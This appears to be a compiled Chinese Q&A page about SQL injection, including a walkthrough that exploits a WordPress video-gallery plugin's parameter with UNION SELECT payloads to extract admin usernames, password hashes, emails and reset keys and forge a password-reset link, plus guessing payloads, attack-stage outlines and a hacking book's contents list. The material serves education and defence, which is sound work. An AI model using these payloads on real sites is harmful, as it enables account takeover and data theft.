⑴ 模拟sql注入
这个比如说:
1的ASCII码是49
我在你的地址上写(char)49
那么你将这个参数取过去,做判断。实际上在你的程序中(char)49已经转化成了1
那么判断通过。
你的程序就会将(char)49进行插入操作。要不插入了要不包错 这也是一种SQL注入
⑵ 自己搭建环境做sql注入实验的问题
数据库装在虚拟机
tomcat
⑶ 如何进行SQL注入攻击
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,首先你要熟悉SQL语句和语法
猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count(列名) from 表名)<>0
也可以这样
and exists (select * from 表名)
and exists (select 列名 from 表名)
⑷ 如何sql注入漏洞攻破linux基础web
SQL注入的基本原理
sql注入成因主要是对页面参数没有进行非法字符校验导致,比如说一个订单页面要显示某个客户的所有订单列表,这个页面的地址可能是http://xxx.com/list.php?customID=3,我们推理,这样页面的后台处理的sql应该是这样的:
select * form custom_order where custom_id = {$_GET['customID']}
按正常情况下,这里的接收的参数{$_GET['customID']}的值应该是传入的值3,这样页面就能正确的把所有客户ID等于3的订单信息显示到页面上。但是,如果这个参数被人恶意改成了如下形式:
http://xxx.com/list.php?customID=-1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
按这样的参数拼装成的sql就成了这样:
select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
这样注入恶意sql后,订单列表页显示的就不是订单信息了,而是数据库中用户的名称和密码,或者任意其它想要的信息。下面我们就按照这个原理来一步一步的获取这个公立学校网站的管理员用户名,管理员邮箱地址,通过邮箱重置管理员密码,登录超级管理员后台。
All Video Gallery插件的漏洞简介
安装了All Video Gallery插件的Wordpress博客里会有这样的一个地址:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11
访问这个页面会显示一些配置信息,问题就出在pid这个参数上,程序后台显然没有严格检查这个参数,我们将利用这个参数进行sql注入。
WordPress是一个开源的平台,我们很容易弄清楚用户表的表名是wp_users,存放用户名,密码,邮件地址的字段分别是user_login,user_pass,user_email,我们下面将要把用户信息表注入进去。
获取超级管理员用户名
为了获取用户表中的用户名,我们注入的sql是这样的:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
获取超级管理员邮件地址
我们可以直接获取用户的密码,但很显然,密码都是加密的,无法使用,我们这里使用另外一种思路,先获取用户的邮件地址,然后使用这个邮件重置用户的密码。
要获取邮件地址,我们需要将上面的sql中的字段名改成user_email:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
重置管理员密码
WordPress的后台登陆地址是http://xxx.com/wp-login.php,这个地址是可以公共访问的,我们进入这个页面后,点击Lost your password?链接,输入上面获取的管理员邮件。
这样做了之后,Wordpress会向这个邮件地址发送一封含有激活码的密码重置地址。我们无法登陆这个邮箱获取这个地址,但我们可以使用上面同样
的方法获取这个激活码,自己拼装出密码重置地址。存放激活码的字段是user_activation_key,我们的sql注入地址改成下面这样:
http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users
在浏览器里输入上面的地址,页面上会显示下面的信息:
有了激活码,我们就可以拼装出装置密码的地址了:
http://xxx.com/wp-login.php?action=rp&key=resetkey&login=username
利用这个地址进入重置密码页面:
总结
我们的黑客行动到此基本上是大功告成,但事实上我并没有去执行最后一步。本文的目的不是要告诉人们如何进行黑客攻击,而是要提醒大家防范安全漏洞,
所谓知己知彼,方能百战不殆,程序员应当对基本的黑客攻击方式有一些了解,针对性的在编程时避免造成类似sql注入的安全漏洞,构筑更健壮的软件。
⑸ 学了理论上的sql注入如何去实践练习
.....不是所有网站都有注入漏洞的,现在很多同学都学会了使用SQL注入
各位站长们也都学会了堵漏洞,所以现在并不容易找到漏洞网站,并不是那些工具不好,而是真的没漏洞,这也是没办法的事,再好的工具也找不到
⑹ 黑客成长日记的作品目录
上网被黑日记.
日记1:遭遇“流氓”与神秘人
一、流氓软件事件
二、流氓软件特点
三、手工清除流氓软件
四、手工查杀3448恶意软件
五、手工清除超级流氓“飘雪”
日记2:初遇黑客
一、黑客的由来
二、黑客常见的攻击手段
三、黑客精神与守则
四、中国黑客简史
菜鸟黑客日记
日记1:windows密码堡垒攻破记
一、最简单的密码破解方法
二、修改屏保文件法
三、软件破解法
日记2:破解双重登录验证密码
一、syskey双重登录密码验证
二、取消syskey启动密码
.三、密码钥匙盘的制作
四、破解syskey加密
日记3:强大的破解工具
日记4:机房中的用户权限提升战
一、csrss本地溢出提升用户权限
二、win键盘提升权限
日记5:花心女友现形——免qq密码看聊天记录
一、“qq聊天记录查看器”偷窥聊天记录
二、“qq免密码登录器”查看聊天记录
日记6:密码破解狂人——论坛、邮箱、上网账号等密码破解
一、论坛、邮箱密码统统拿
二、清除ie分级审查密码
三、查看星号密码
四、查看宽带拨号密码
五、恢复ie未保存的邮箱密码
六、清除foxmall账号密码
七、找出adsl登录密码
日记7:加密文档破解记
一、加密软件真相
二、破解“e-神加密文件夹”
三、破解“紫电文件夹加密保护神”加密文档
四、破解“高强度加密大师”加密文档
五、强制删除“高强度加密大师”保护文件
六、“文件夹嗅探器“破解加密文件
七、“文件夹加密超级大师”解密测试
攻防平台搭建日记
日记1:黑客技术训练营搭建记
一、黑客技术训练场所——虚拟机
二、vmware虚拟机
三、virtual pc虚拟机
日记2:我的第一个网站
一、网站攻击学习园地
二、在虚拟机上架设iis服务器
三、在虚拟机中安装网站
日记3:欲练神功,挥刀自“攻”——虚拟机中的ipc$入侵实验
一、ipc$入侵简介
二、ipc$连接的要求
三、关于windows操作系统的默认共享
四、在虚拟机中搭建ipc$入侵环境
五、在虚拟机中的ipc$入侵学习
局域网黑客日记
日记1:近水楼台先得月——共享入侵
一、smb共享介绍
二、x-scan扫描windows共享主机
三、专用共享资源扫描工具shed
四、虚拟机中的windows共享入侵实例
日记2:和胖子开个玩笑——ip攻击小记
一、ip攻击概念及分类
二、ip冲突攻击利器——网络特工
三、ip欺骗攻击
四、arp式ip地址冲突攻击
日记3:遭遇“终结者”攻击
一、断网攻击
二、网速限制
三、禁用下载
四、禁止打开网页
五、攻击网络聊天软件
六、反p2p终结者
七、让p2p终结者改邪归正
日记4:嗅探的季节,密码大丰收
一、何为嗅探
二、嗅探工具的使用
三、远程嗅探
四、交换机环境下的网络嗅探
日记5:整蛊黑心网吧——突破网吧限制管理
一、突破网吧下载限制
二、突破限制查看硬盘
三、使用软件突破网吧限制
四、网吧中的一次综合破解流程
五、突破万象2006
互联网黑客日记
日记1:公主复仇——qq破解记
一、qq密码本地破解
二、远程破解qq密码
三、qq传送木马程序的绝招
四、完美隐藏和伪装qq ip地址
日记2:匡扶正义的行动——主机入侵记
一、找出目标的ip地址
二、扫描目标主机的漏洞
三、利用漏洞进行溢出攻击
日记3:花心男友罪行记录——入侵后的操作..
一、上传木马后门
二、获取管理员密码与账号后门
三、远程3389终端的开启与伪装
四、搞定杀毒软件,防火墙
五、后门上传与服务伪装
六、控制内网
七、清除入侵记录
日记4:入侵后的思考
一、远程获取管理员密码
二、账号克隆与隐藏
三、使用铁血ca克隆账号
四、突破防火墙与tcp/ip筛选
五、突破windows xpsp2“安全中心”
日记5:刻苦练技——远程溢出攻击
一、远程溢出攻击概念
二、wins ms04045远程溢出漏洞
三、windows ssllibrary远程溢出攻击
四、mso 5-051远程溢出漏洞
日记6:学习笔记——应用软件的远程溢出
一、ccproxy6.1/6.2远程溢出攻击
二、serv-uftpserver远程溢出攻击
三、serv-uftpserver远程拒绝服务攻击
四、ildap服务远程溢出攻击imail server
五、foxmail远程溢出攻击
日记7:木马伪装术
一、木马捆绑
二、木马加壳
三、修改木马程序特征码
四、rootkit彻底隐藏木马程序
五、制作网页木马程序
六、制作电子书木马程序
日记8:黑客大战——网站攻击实战
一、mybloggie博客漏洞介绍
二、mybloggie博客漏洞注入攻击
三、入侵控制服务器
四、“僵尸网络”——新型ddos攻击
五、利用challengecollapsar进行攻击
日记9:黑客扬名被捕记
一、动网论坛挂马
二、vbulletin3论坛注入漏洞
三、入侵bbsxp论坛,巧获webshell
四、入侵phpwind论坛
“准”黑客的转型日记
日记1:遭遇入侵
一、系统后门与账号克隆
二、检测与恢复克隆账号
三、恢复被克隆的系统内置账号——最强大的工具mt
四、监控cmd远程溢出入侵
日记2:木马检测与清除记
一、系统网络之门——初识端口
二、windows中的端口查看器
三、谁开放了“端口”
四、用netstat查看端口进程
五、图形化的端口管理工具
六、监视端口的一举一动
七、找出木马进程
八、结束木马进程
日记3:正版杀毒软件与木马风波
一、手工清除木马病毒流程
二、清除所有启动项目
三、查找可疑进程
四、结束木马进程
五、删除木马文件
六、慎重强行删除木马
七、善后工作
日记4:安全防范
一、阻止木马病毒攻击的安全防范
二、用tcp/ip策略关闭本机端口
三、使用ipseccmd工具自动关闭危险端口
四、安装升级第三方杀毒软件及防火墙
五、在线安全检测
日记5:宿舍网突现危机
一、密码的设置及保护
二、密码安全性
三、密码输入用“账号守护专家”
四、advancedpassword generator生成强壮密码
日记6:维护校园网
一、网络顽疾,ip地址攻击
二、追查ip地址盗用者信息
三、防范ip地址盗用
四、防范arp欺骗
五、备份网络和帐号信息
日记7:试手计算机爱好者协会
一、sql注入与防范
二、sql注入的防范原理
三、密码登录框sql注入防范
四、表单sql注入防范——限制字符串长度
五、url链接类sql注入防范——参数类型过滤
六、使用“sql通用防注入程序”防范sql注入攻击
七、加密数据库,对用户输入“消毒”
八、防范暴库下载
九、管理员页面注入防范——session验证
十、在php网页中防范sql注入的方法
职业规划日记
日记1:职业思考——网络安全技术认证
一、网络安全师——未来的十大热门职业之一
二、网络安全技术认证考试分类
三、四种安全认证介绍比较
日记2:确立发展目标——cisco网络技术图书推荐
一、cisco网络技术学院简介
二、cisco网络技术学院系列图书
三、cisco职业认证培训系列图书
附录:黑客必会命令...
⑺ 谁给讲讲SQL注入攻击的步骤
动态网页中可能只有一个参数,有时可能有N个参数,有时是整型参数,有时是字符串型参数,不能一概而论。
⑻ 在vmware虚拟机上做一下针对数据库的注入攻击实验,怎样搭建环境建立网站
这个真的不知道..........
⑼ 怎么搭建虚拟机测试SQL注入攻击
安装虚拟机-------在虚拟机上安装操作系统---------安装各种软件
一步一步来,不会的话可以在网上找一个视频教程!
⑽ 求教谁给讲讲SQL注入攻击的步骤
第一步:SQL注入点探测。探测SQL注入点是关键的第一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。通常只要带有输入提交的动态网页,并且动态网页访问数据库,就可能存在SQL注入漏洞。如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户输入未进行有效验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞。
第二步:收集后台数据库信息。不同数据库的注入方法、函数都不尽相同,因此在注入之前,我们先要判断一下数据库的类型。判断数据库类型的方法有很多,可以输入特殊字符,如单引号,让程序返回错误信息,我们根据错误信息提示进行判断,还可以使用特定函数来判断。
第三步:猜解用户名和密码。数据库中的表和字段命名一般都是有规律的,通过构造特殊的SQL语句在数据库中依次猜解出表名、字段名、字段数、用户名和密码。
第四步:查找Web后台管理入口。Web后台管理通常不对普通用户开放,要找到后台管理的登录网址,可以利用Web目录扫描工具快速搜索到可能的登录地址,然后逐一尝试,便可以找到后台管理平台的登录网址。
第五步:入侵和破坏。一般后台管理具有较高权限和较多的功能,使用前面已破译的用户名、密码成功登录后台管理平台后,就可以任意进行破坏,比如上传木马、篡改网页、修改和窃取信息等,还可以进一步提权,入侵Web服务器和数据库服务器。